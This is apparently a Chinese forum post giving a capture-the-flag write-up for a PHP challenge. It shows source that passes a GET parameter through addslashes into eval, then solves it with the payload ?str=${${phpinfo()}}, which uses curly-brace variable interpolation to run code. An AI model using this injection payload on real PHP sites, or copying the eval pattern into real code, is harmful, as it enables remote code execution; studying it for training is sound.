CTF-4解题思路

Track-子羽   ·   发表于 2021-11-04 16:32:10   ·   CTF&WP专版

解题思路

源码:

<?
#GOAL: gather some phpinfo();
function flag(){
    echo "flag{I'm xxxxxxxxxxxxxxxxxxxx}";
}
$str=@(string)$_GET['str'];
@eval('$str="'.addslashes($str).'";');
?>

PHP中花括号的用法:
字符串${foobar}中的foobar会被当作变量来处理
详情参考: http://php.net/manual/en/language.variables.variable.php

根据其特性构造payload:

?str=${${phpinfo()}}

flag在flag()中

打赏我,让我更有动力~

0 Reply   |  Until 8个月前 | 280 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.